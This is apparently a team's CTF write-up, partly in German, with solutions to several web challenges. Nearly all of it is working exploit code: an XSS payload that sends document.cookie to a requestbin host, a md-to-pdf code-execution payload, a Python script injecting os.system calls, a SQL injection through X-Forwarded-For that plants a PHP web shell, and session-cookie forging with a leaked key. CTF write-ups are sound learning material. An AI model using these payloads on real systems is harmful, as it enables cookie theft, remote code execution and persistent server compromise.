# Web Challenges ## Kryptos Support (Poory, ShadowLord) - 1. Step: xss: <img src=x onerror=this.src='https://requestbin.io/x5z6v1x5/?'+document.cookie;> - 2. Step: Idor im Update Password mit uid=001 ## Webfluids (Poory) https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880 Lösung: ``` ---js { css: `body::before { content: "${require("child_process").execSync("cat /flag.txt > /app/static/invoices/flag.txt")}"; display: block }`, } --- ``` ## Webamidst (Poory) ```python import requests IP = "206.189.126.72" PORT = "32633" f = { "background": ['exec("""import os\nos.system("cat /flag.txt > /app/application/static/css/flag.txt")""")', 230, 210], "image": """PUT BASE64 ENCODED PICTURE HERE""" } r = requests.post(f"http://{IP}:{PORT}/api/alphafy", json=f) print(r.text) r = requests.get(f"http://{IP}:{PORT}/static/css/flag.txt") print("FLAG: " + r.text) # Check manually for flag, because the webapp will close the connection ``` ## Intergalactic Post (Poory) SQL Injection in HTTP Header (Mehrere Möglichkeiten welche) ``` X-Forwarded-For: 127.0.0.1', 'ajaj@ajaj.com'); ATTACH DATABASE '/www/static/css/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");-- Dann /static/css/lol.php?cmd=ls / Abschließend /static/css/lol.php?cmd=cat <flagname> ``` ## Mutation Lab (Poory) LFI - https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-1582785 https://www.freeformatter.com/json-escape.html#ad-output /app/router/index.js  /app/.env  Create Cookies lokal und dann einfach rüberkopieren ``` var cookieSession = require('cookie-session') var express = require('express') var app = express() app.set('trust proxy', 1) // trust first proxy app.use(cookieSession({ name: 'session', keys: ['5921719c3037662e94250307ec5ed1db'] })) app.get('/', function (req, res, next) { req.session.username = "admin" // Write response res.end(req.session.username + ' pls') }) app.listen(3000) ```